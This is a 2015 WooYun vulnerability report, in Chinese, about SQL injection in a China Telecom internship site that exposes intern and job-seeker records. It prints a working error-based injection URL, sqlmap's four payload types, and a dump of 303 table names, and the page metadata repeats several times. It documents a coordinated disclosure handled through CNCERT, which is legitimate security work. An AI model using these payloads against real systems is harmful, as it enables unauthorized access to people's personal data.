运营商安全之中国电信分站SQL注入漏洞影响大量实习生信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144241

漏洞标题：运营商安全之中国电信分站SQL注入漏洞影响大量实习生信息

漏洞作者：路人甲

提交时间：2015-09-30 16:11

修复时间：2015-11-24 16:42

公开时间：2015-11-24 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-30：细节已通知厂商并且等待厂商处理中
2015-10-10：厂商已经确认，细节仅向厂商公开
2015-10-20：细节向核心白帽子及相关领域专家公开
2015-10-30：细节向普通白帽子公开
2015-11-09：细节向实习白帽子公开
2015-11-24：细节向公众公开

简要描述：

实习生,学生,各种求职生信息..

详细说明：

http://**.**.**.**/shixibao/e/extend/company.php?id=10504

http://**.**.**.**/shixibao/e/extend/company.php?id=10504%20and (select 1 from  (select count(*),concat((select version()),floor(rand(0)*2))x from  information_schema.tables group by x)a)#

user:admin@**.**.**.**
database:shixibao1
version:5.6.16-log1

丢sqlmap跑一下

300个表，里面有大量实习生，求职生信息

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-2685 OR 5746=5746#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-9802 OR 1 GROUP BY CONCAT(0x716b767671,(SELECT (CASE WHEN (5242=5242) THEN 1 ELSE 0 END)),0x717a706a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (5004=5004) THEN SLEEP(5) ELSE 5004*(SELECT 5004 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: id=-8000 UNION ALL SELECT CONCAT(0x716b767671,0x55514d6d4364655a7662,0x717a706a71)#
---
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL 5.0.12
Database: shixibao
[303 tables]
+-------------------------------------+
| ecms_post_mapping                   |
| ecms_post_mapping_history           |
| mm_zhiweiapply_view                 |
| phome_ecms_article                  |
| phome_ecms_article_check            |
| phome_ecms_article_check_data       |
| phome_ecms_article_data_1           |
| phome_ecms_article_doc              |
| phome_ecms_article_doc_data         |
| phome_ecms_article_doc_index        |
| phome_ecms_article_index            |
| phome_ecms_download                 |
| phome_ecms_download_check           |
| phome_ecms_download_check_data      |
| phome_ecms_download_data_1          |
| phome_ecms_download_doc             |
| phome_ecms_download_doc_data        |
| phome_ecms_download_doc_index       |
| phome_ecms_download_index           |
| phome_ecms_flash                    |
| phome_ecms_flash_check              |
| phome_ecms_flash_check_data         |
| phome_ecms_flash_data_1             |
| phome_ecms_flash_doc                |
| phome_ecms_flash_doc_data           |
| phome_ecms_flash_doc_index          |
| phome_ecms_flash_index              |
| phome_ecms_info                     |
| phome_ecms_info_check               |
| phome_ecms_info_check_data          |
| phome_ecms_info_data_1              |
| phome_ecms_info_doc                 |
| phome_ecms_info_doc_data            |
| phome_ecms_info_doc_index           |
| phome_ecms_info_index               |
| phome_ecms_infoclass_article        |
| phome_ecms_infoclass_download       |
| phome_ecms_infoclass_flash          |
| phome_ecms_infoclass_info           |
| phome_ecms_infoclass_movie          |
| phome_ecms_infoclass_news           |
| phome_ecms_infoclass_photo          |
| phome_ecms_infoclass_shop           |
| phome_ecms_infoclass_tongzhi        |
| phome_ecms_infoclass_zhiwei         |
| phome_ecms_infoclass_zhiwei1        |
| phome_ecms_infoclass_zhiwei2        |
| phome_ecms_infoclass_zt             |
| phome_ecms_infotmp_article          |
| phome_ecms_infotmp_download         |
| phome_ecms_infotmp_flash            |
| phome_ecms_infotmp_info             |
| phome_ecms_infotmp_movie            |
| phome_ecms_infotmp_news             |
| phome_ecms_infotmp_photo            |
| phome_ecms_infotmp_shop             |
| phome_ecms_infotmp_tongzhi          |
| phome_ecms_infotmp_zhiwei           |
| phome_ecms_infotmp_zhiwei1          |
| phome_ecms_infotmp_zhiwei2          |
| phome_ecms_infotmp_zt               |
| phome_ecms_jianzhi_crawl            |
| phome_ecms_jianzhi_crawl_test       |
| phome_ecms_locationorder            |
| phome_ecms_movie                    |
| phome_ecms_movie_check              |
| phome_ecms_movie_check_data         |
| phome_ecms_movie_data_1             |
| phome_ecms_movie_doc                |
| phome_ecms_movie_doc_data           |
| phome_ecms_movie_doc_index          |
| phome_ecms_movie_index              |
| phome_ecms_news                     |
| phome_ecms_news_check               |
| phome_ecms_news_check_data          |
| phome_ecms_news_data_1              |
| phome_ecms_news_doc                 |
| phome_ecms_news_doc_data            |
| phome_ecms_news_doc_index           |
| phome_ecms_news_index               |
| phome_ecms_photo                    |
| phome_ecms_photo_check              |
| phome_ecms_photo_check_data         |
| phome_ecms_photo_data_1             |
| phome_ecms_photo_doc                |
| phome_ecms_photo_doc_data           |
| phome_ecms_photo_doc_index          |
| phome_ecms_photo_index              |
| phome_ecms_shop                     |
| phome_ecms_shop_check               |
| phome_ecms_shop_check_data          |
| phome_ecms_shop_data_1              |
| phome_ecms_shop_doc                 |
| phome_ecms_shop_doc_data            |
| phome_ecms_shop_doc_index           |
| phome_ecms_shop_index               |
| phome_ecms_tongzhi                  |
| phome_ecms_tongzhi_check            |
| phome_ecms_tongzhi_check_data       |
| phome_ecms_tongzhi_data_1           |
| phome_ecms_tongzhi_doc              |
| phome_ecms_tongzhi_doc_data         |
| phome_ecms_tongzhi_doc_index        |
| phome_ecms_tongzhi_index            |
| phome_ecms_zhiwei                   |
| phome_ecms_zhiwei1                  |
| phome_ecms_zhiwei1_check            |
| phome_ecms_zhiwei1_check_data       |
| phome_ecms_zhiwei1_data_1           |
| phome_ecms_zhiwei1_doc              |
| phome_ecms_zhiwei1_doc_data         |
| phome_ecms_zhiwei1_doc_index        |
| phome_ecms_zhiwei1_index            |
| phome_ecms_zhiwei2                  |
| phome_ecms_zhiwei2_check            |
| phome_ecms_zhiwei2_check_data       |
| phome_ecms_zhiwei2_data_1           |
| phome_ecms_zhiwei2_doc              |
| phome_ecms_zhiwei2_doc_data         |
| phome_ecms_zhiwei2_doc_index        |
| phome_ecms_zhiwei2_index            |
| phome_ecms_zhiwei_check             |
| phome_ecms_zhiwei_check_data        |
| phome_ecms_zhiwei_crawl             |
| phome_ecms_zhiwei_crawl_1           |
| phome_ecms_zhiwei_crawl_copy        |
| phome_ecms_zhiwei_crawl_copy_backup |
| phome_ecms_zhiwei_crawl_copy_cl     |
| phome_ecms_zhiwei_crawl_sxs         |
| phome_ecms_zhiwei_crawl_sxs1        |
| phome_ecms_zhiwei_crawl_sxs_copy    |
| phome_ecms_zhiwei_crawl_test        |
| phome_ecms_zhiwei_data_1            |
| phome_ecms_zhiwei_doc               |
| phome_ecms_zhiwei_doc_data          |
| phome_ecms_zhiwei_doc_index         |
| phome_ecms_zhiwei_history           |
| phome_ecms_zhiwei_index             |
| phome_ecms_zt                       |
| phome_ecms_zt_check                 |
| phome_ecms_zt_check_data            |
| phome_ecms_zt_data_1                |
| phome_ecms_zt_doc                   |
| phome_ecms_zt_doc_data              |
| phome_ecms_zt_doc_index             |
| phome_ecms_zt_index                 |
| phome_enewsad                       |
| phome_enewsadclass                  |
| phome_enewsadminstyle               |
| phome_enewsbefrom                   |
| phome_enewsbq                       |
| phome_enewsbqclass                  |
| phome_enewsbqtemp                   |
| phome_enewsbqtempclass              |
| phome_enewsbuybak                   |
| phome_enewsbuygroup                 |
| phome_enewscard                     |
| phome_enewsclass                    |
| phome_enewsclass_stats              |
| phome_enewsclass_stats_ip           |
| phome_enewsclass_stats_set          |
| phome_enewsclassadd                 |
| phome_enewsclassf                   |
| phome_enewsclassnavcache            |
| phome_enewsclasstemp                |
| phome_enewsclasstempclass           |
| phome_enewsdiggips                  |
| phome_enewsdo                       |
| phome_enewsdolog                    |
| phome_enewsdownerror                |
| phome_enewsdownrecord               |
| phome_enewsdownurlqz                |
| phome_enewserrorclass               |
| phome_enewsf                        |
| phome_enewsfava                     |
| phome_enewsfavaclass                |
| phome_enewsfeedback                 |
| phome_enewsfeedbackclass            |
| phome_enewsfeedbackf                |
| phome_enewsfile_1                   |
| phome_enewsfile_member              |
| phome_enewsfile_other               |
| phome_enewsfile_public              |
| phome_enewsgbook                    |
| phome_enewsgbookclass               |
| phome_enewsgfenip                   |
| phome_enewsgroup                    |
| phome_enewshmsg                     |
| phome_enewshnotice                  |
| phome_enewshy                       |
| phome_enewshyclass                  |
| phome_enewsindexpage                |
| phome_enewsinfoclass                |
| phome_enewsinfotype                 |
| phome_enewsinfovote                 |
| phome_enewsjstemp                   |
| phome_enewsjstempclass              |
| phome_enewskey                      |
| phome_enewskeyclass                 |
| phome_enewslink                     |
| phome_enewslinkclass                |
| phome_enewslinktmp                  |
| phome_enewslisttemp                 |
| phome_enewslisttempclass            |
| phome_enewslog                      |
| phome_enewsloginfail                |
| phome_enewsmember                   |
| phome_enewsmember_connect           |
| phome_enewsmember_connect_app       |
| phome_enewsmemberadd                |
| phome_enewsmemberf                  |
| phome_enewsmemberfeedback           |
| phome_enewsmemberform               |
| phome_enewsmembergbook              |
| phome_enewsmembergroup              |
| phome_enewsmemberpub                |
| phome_enewsmenu                     |
| phome_enewsmenuclass                |
| phome_enewsmod                      |
| phome_enewsnewstemp                 |
| phome_enewsnewstempclass            |
| phome_enewsnotcj                    |
| phome_enewsnotice                   |
| phome_enewspage                     |
| phome_enewspageclass                |
| phome_enewspagetemp                 |
| phome_enewspayapi                   |
| phome_enewspayrecord                |
| phome_enewspic                      |
| phome_enewspicclass                 |
| phome_enewspl_1                     |
| phome_enewspl_set                   |
| phome_enewsplayer                   |
| phome_enewsplf                      |
| phome_enewspltemp                   |
| phome_enewspostdata                 |
| phome_enewspostserver               |
| phome_enewsprinttemp                |
| phome_enewspublic                   |
| phome_enewspublic_update            |
| phome_enewspubtemp                  |
| phome_enewspubvar                   |
| phome_enewspubvarclass              |
| phome_enewsqmsg                     |
| phome_enewssearch                   |
| phome_enewssearchall                |
| phome_enewssearchall_load           |
| phome_enewssearchtemp               |
| phome_enewssearchtempclass          |
| phome_enewsshop_address             |
| phome_enewsshop_ddlog               |
| phome_enewsshop_precode             |
| phome_enewsshop_set                 |
| phome_enewsshopdd                   |
| phome_enewsshopdd_add               |
| phome_enewsshoppayfs                |
| phome_enewsshopps                   |
| phome_enewssp                       |
| phome_enewssp_1                     |
| phome_enewssp_2                     |
| phome_enewssp_3                     |
| phome_enewssp_3_bak                 |
| phome_enewsspacestyle               |
| phome_enewsspclass                  |
| phome_enewssql                      |
| phome_enewstable                    |
| phome_enewstags                     |
| phome_enewstagsclass                |
| phome_enewstagsdata                 |
| phome_enewstask                     |
| phome_enewstempbak                  |
| phome_enewstempdt                   |
| phome_enewstempgroup                |
| phome_enewstempvar                  |
| phome_enewstempvarclass             |
| phome_enewstogzts                   |
| phome_enewsuser                     |
| phome_enewsuseradd                  |
| phome_enewsuserclass                |
| phome_enewsuserjs                   |
| phome_enewsuserjsclass              |
| phome_enewsuserlist                 |
| phome_enewsuserlistclass            |
| phome_enewsuserloginck              |
| phome_enewsvote                     |
| phome_enewsvotemod                  |
| phome_enewsvotetemp                 |
| phome_enewswapstyle                 |
| phome_enewswfinfo                   |
| phome_enewswfinfolog                |
| phome_enewswords                    |
| phome_enewsworkflow                 |
| phome_enewsworkflowitem             |
| phome_enewswriter                   |
| phome_enewsyh                       |
| phome_enewszt                       |
| phome_enewsztadd                    |
| phome_enewsztclass                  |
| phome_enewsztf                      |
| phome_enewsztinfo                   |
| phome_enewszttype                   |
| phome_enewszttypeadd                |
| yjsqzw                              |
+-------------------------------------+

漏洞证明：

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-10-10 16:40

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向中国电信集团公司通报，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144241

漏洞标题：运营商安全之中国电信分站SQL注入漏洞影响大量实习生信息

相关厂商：中国电信

漏洞作者：路人甲

提交时间：2015-09-30 16:11

修复时间：2015-11-24 16:42

公开时间：2015-11-24 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144241

漏洞标题：运营商安全之中国电信分站SQL注入漏洞影响大量实习生信息

相关厂商：中国电信

漏洞作者： 路人甲

提交时间：2015-09-30 16:11

修复时间：2015-11-24 16:42

公开时间：2015-11-24 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144241"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云